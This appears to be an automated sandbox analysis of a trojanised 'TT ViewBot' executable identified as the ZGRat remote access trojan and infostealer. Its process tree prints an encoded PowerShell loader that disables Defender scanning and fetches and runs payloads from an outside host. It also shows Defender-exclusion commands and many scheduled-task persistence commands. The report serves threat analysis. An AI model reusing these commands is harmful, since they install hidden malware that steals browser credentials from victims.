Overview

overview

10

Static

static

1

TT ViewBot...sts.py

windows7-x64

3

TT ViewBot...sts.py

windows10-2004-x64

3

TT ViewBot...xie.py

windows7-x64

3

TT ViewBot...xie.py

windows10-2004-x64

3

TT ViewBot...ent.py

windows7-x64

3

TT ViewBot...ent.py

windows10-2004-x64

3

TT ViewBot...rt.exe

windows7-x64

10

TT ViewBot...rt.exe

windows10-2004-x64

10

TT ViewBot...tup.py

windows7-x64

3

TT ViewBot...tup.py

windows10-2004-x64

7

Resubmissions

05-05-2024 18:01

240505-wl1ghabh23 10

05-05-2024 17:56

240505-wjdvqabg39 10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-05-2024 17:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TT ViewBot v2.0/bot_start.exe

  • Size

    2.5MB

  • MD5

    bf4a8b1ff2f896acac3e7ace357abfca

  • SHA1

    c1bd1b3d2959d844f6b4e339f45d3749667df3e1

  • SHA256

    e0d1d7c74b52bbd40f5dc85cb9b3ab69ae750d8fc3f5fbd15a98eed616c1ce8e

  • SHA512

    fd7082a905540e23a5c5b6fd2717c0255ede2680bef16076f174d417bbeef4694e2fa82a8f9e0407cc160344cc194edd19ab40901b468c1695a1b8773e23e494

  • SSDEEP

    49152:Tfx0DZfVUfCnJA3bxBLbsgyGKEQYdfT3kVYCNN5oUpwmJFkjQuQLLOet:l4ZnIlBvyGKJA3kVD4lIl7r

Score
10/10
zgratexecutionratspywarestealer

Malware Config

Signatures

  • Detect ZGRat V1 3 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe
    "C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3868
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBuAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBqAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGoAdABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB2AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABtAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAZAB1AGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHgAaAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwB1AGUAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAHUAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGEAYQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAawBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZQB0AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB4AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB4AHYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBtAGEAaQBuAC4AcAB5ACcAKQA8ACMAYwB1AGwAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe
        "C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2308
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4996
            • C:\ChainReview\tthyperRuntimedhcpSvc.exe
              "C:\ChainReview/tthyperRuntimedhcpSvc.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:516
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\dllhost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2252
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\RuntimeBroker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:3576
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PolicyDefinitions\fontdrvhost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:4780
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\StartMenuExperienceHost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:3188
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Start Menu\wininit.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:4960
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xy2Iph9yYA.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:224
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                    PID:3224
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    8⤵
                      PID:1672
                    • C:\Windows\PolicyDefinitions\fontdrvhost.exe
                      "C:\Windows\PolicyDefinitions\fontdrvhost.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3532
      • C:\Windows\system32\OpenWith.exe
        C:\Windows\system32\OpenWith.exe -Embedding
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:4980
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\VideoLAN\VLC\dllhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1616
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3708
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3904
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\ChainReview\RuntimeBroker.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4204
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4840
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\ChainReview\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3156
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Windows\PolicyDefinitions\fontdrvhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:3956
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\fontdrvhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2288
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Windows\PolicyDefinitions\fontdrvhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1624
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4456
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2324
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4772
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Start Menu\wininit.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:4572
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default\Start Menu\wininit.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1552
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Start Menu\wininit.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:856

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat
        Filesize

        91B

        MD5

        6c4e82d40f84cbc9a6fec4a5a981a42d

        SHA1

        b9b43a7e2f9f4ad4767974bf4304a9e2a044fca3

        SHA256

        78d5a5d4618dce787ecc963e5f499af55e8c733b28842311f59d4f385ec42d5b

        SHA512

        262c93cb040935bd1f3b7ef8140e6ac322a9601ebb0004b5da24edea0b268db6b178f1d3c5d62c6e95b717603a3d29a00c56f90c8c3479b98335617e42700842

        Download Submit

      • C:\ChainReview\tthyperRuntimedhcpSvc.exe
        Filesize

        2.0MB

        MD5

        4518369532566e624ed62d5715fc072c

        SHA1

        c8a4e4d75a1d3ef9e772b7264d61a4a65c37db33

        SHA256

        ad29e830bbc1cb324af918e800caed762d0d2e5a76cdca70cd3926d06add78f0

        SHA512

        d08d1124262cb10862562cccb7c4c1af0a9cc1c0f298fa8a596d528fb8b8be4804217c648de327f57c360267ab756db35b067f3961d1efd50b409a04a1505ae0

        Download Submit

      • C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe
        Filesize

        212B

        MD5

        43e82435c4abdf7a34d3f8ac5c575deb

        SHA1

        6d41a829dc856e7d911e8a95e8a4c7463cf18043

        SHA256

        1a8093c1223cfab24ebb1185ee1e5ac65909caf9ee9d5d6dc600c82a5d040acf

        SHA512

        e05cd9e7d232e452cc337335603864368ec042a7f6e322a4d76eb62ada78fca956a17a93d97c86b859e2114f8b2d6d2a0cb60190b8dad6797a62c31d92e6037f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Filesize

        53KB

        MD5

        124edf3ad57549a6e475f3bc4e6cfe51

        SHA1

        80f5187eeebb4a304e9caa0ce66fcd78c113d634

        SHA256

        638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

        SHA512

        b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        19KB

        MD5

        feb57329e02525b8c3ffe7e4b7d0b428

        SHA1

        062ef15a4a3511f4d789b2414eca52996ff8df7b

        SHA256

        32544f70e258c58866b529ac1dbd90a98ba5d974e8d57b09795a76a791634413

        SHA512

        f1a64bc52b93865648d6955a16b8a779286399e6c689791bf5c5eb30c97a9051d56b563983d36fc0cf729299c2aa714bd2bbf3a336c7ebf21c2fed81323c1daa

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        c697637a9b17f577fccd7e83a5495810

        SHA1

        04e6054584786b88994b0e0a871562227fe2a435

        SHA256

        54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

        SHA512

        66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_roqfssvy.jv1.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\xy2Iph9yYA.bat
        Filesize

        220B

        MD5

        e92d52d11eb8aafbfc27c473fb651e05

        SHA1

        c36d0d05a76964ddf71b9cc50c54a5dbff4a12d9

        SHA256

        671f91ad485e15d0ce7e93d287003b6b4d6691b9055bfc0686045948b47bb3b3

        SHA512

        336888e30404bddef619f8a70141973c7b758ad2657b16732de07a0c4f0bab530faa5de1dfefc7004378283604efc2d89a17c11614dfb25eac991af98b1c1170

        Download Submit

      • C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe
        Filesize

        2.3MB

        MD5

        ce2e801c8d8413da9fe8f98723aab971

        SHA1

        784e4689c62131f43e4c9cd5883f433b88cf08d6

        SHA256

        79af1d0cd368f54b46320eceb7d9931049daf12207ff5e2226f10d9f8e068ca2

        SHA512

        951e938d6e52a6c2918bb0ad86b85cbc107092b6add73fda1ad6b312d3cc47864809370341b513aacbb4ea77002cb1822e7b8c1ab4429e56f2d32b7b16a4e664

        Download Submit

      • memory/516-93-0x000000001B430000-0x000000001B43E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/516-83-0x000000001B6B0000-0x000000001B700000-memory.dmp

        Filesize

        320KB

        Download

      • memory/516-91-0x000000001B3E0000-0x000000001B3EC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/516-149-0x000000001C800000-0x000000001C8CD000-memory.dmp

        Filesize

        820KB

        Download

      • memory/516-89-0x000000001B3D0000-0x000000001B3DE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/516-87-0x00000000029A0000-0x00000000029AE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/516-85-0x000000001B410000-0x000000001B428000-memory.dmp

        Filesize

        96KB

        Download

      • memory/516-95-0x000000001B440000-0x000000001B44C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/516-82-0x000000001B3F0000-0x000000001B40C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/516-80-0x0000000002990000-0x000000000299E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/516-78-0x00000000005B0000-0x00000000007B6000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/2252-210-0x000002D0A1620000-0x000002D0A162A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2252-211-0x000002D0A19E0000-0x000002D0A19FA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2252-230-0x000002D0A1380000-0x000002D0A14CE000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/2372-26-0x0000000075310000-0x0000000075AC0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2372-11-0x0000000006080000-0x00000000060E6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2372-43-0x0000000007D60000-0x0000000007DF6000-memory.dmp

        Filesize

        600KB

        Download

      • memory/2372-44-0x0000000006790000-0x00000000067A1000-memory.dmp

        Filesize

        68KB

        Download

      • memory/2372-45-0x00000000067D0000-0x00000000067DE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2372-46-0x0000000007D40000-0x0000000007D54000-memory.dmp

        Filesize

        80KB

        Download

      • memory/2372-47-0x0000000007E20000-0x0000000007E3A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2372-48-0x0000000007E10000-0x0000000007E18000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2372-49-0x0000000007E90000-0x0000000007EB2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2372-50-0x0000000008D50000-0x00000000092F4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2372-41-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2372-64-0x000000007531E000-0x000000007531F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2372-65-0x0000000075310000-0x0000000075AC0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2372-40-0x0000000008120000-0x000000000879A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2372-39-0x0000000007990000-0x0000000007A33000-memory.dmp

        Filesize

        652KB

        Download

      • memory/2372-38-0x0000000007920000-0x000000000793E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2372-28-0x0000000071130000-0x000000007117C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2372-27-0x0000000007940000-0x0000000007972000-memory.dmp

        Filesize

        200KB

        Download

      • memory/2372-5-0x000000007531E000-0x000000007531F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2372-25-0x0000000075310000-0x0000000075AC0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2372-24-0x0000000006830000-0x000000000687C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2372-23-0x00000000054A0000-0x00000000054BE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2372-22-0x0000000006160000-0x00000000064B4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2372-42-0x0000000007B50000-0x0000000007B5A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2372-12-0x00000000060F0000-0x0000000006156000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2372-10-0x0000000005750000-0x0000000005772000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2372-6-0x0000000005140000-0x0000000005176000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2372-9-0x00000000058E0000-0x0000000005F08000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2372-8-0x0000000075310000-0x0000000075AC0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2372-7-0x0000000075310000-0x0000000075AC0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3188-207-0x0000025466040000-0x00000254660F5000-memory.dmp

        Filesize

        724KB

        Download

      • memory/3188-209-0x0000025466480000-0x000002546649C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/3188-115-0x000002544DC10000-0x000002544DC32000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3188-229-0x0000025465EB0000-0x0000025465FFE000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/3532-239-0x000000001CF50000-0x000000001D01D000-memory.dmp

        Filesize

        820KB

        Download

      • memory/3576-227-0x000001F26FE10000-0x000001F26FF5E000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/3576-206-0x000001F26FA50000-0x000001F26FA6C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/3868-0-0x0000000000400000-0x0000000000E07000-memory.dmp

        Filesize

        10.0MB

        Download

      • memory/3868-4-0x000000007FA70000-0x000000007FE41000-memory.dmp

        Filesize

        3.8MB

        Download

      • memory/3868-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

        Filesize

        3.8MB

        Download

      • memory/3868-3-0x0000000000400000-0x0000000000E07000-memory.dmp

        Filesize

        10.0MB

        Download

      • memory/4780-213-0x0000025549610000-0x0000025549616000-memory.dmp

        Filesize

        24KB

        Download

      • memory/4780-228-0x0000025549010000-0x000002554915E000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/4780-214-0x0000025549620000-0x000002554962A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4960-226-0x000001D4BD700000-0x000001D4BD84E000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/4960-212-0x000001D4BDA60000-0x000001D4BDA68000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4960-208-0x000001D4BD5E0000-0x000001D4BD5EA000-memory.dmp

        Filesize

        40KB

        Download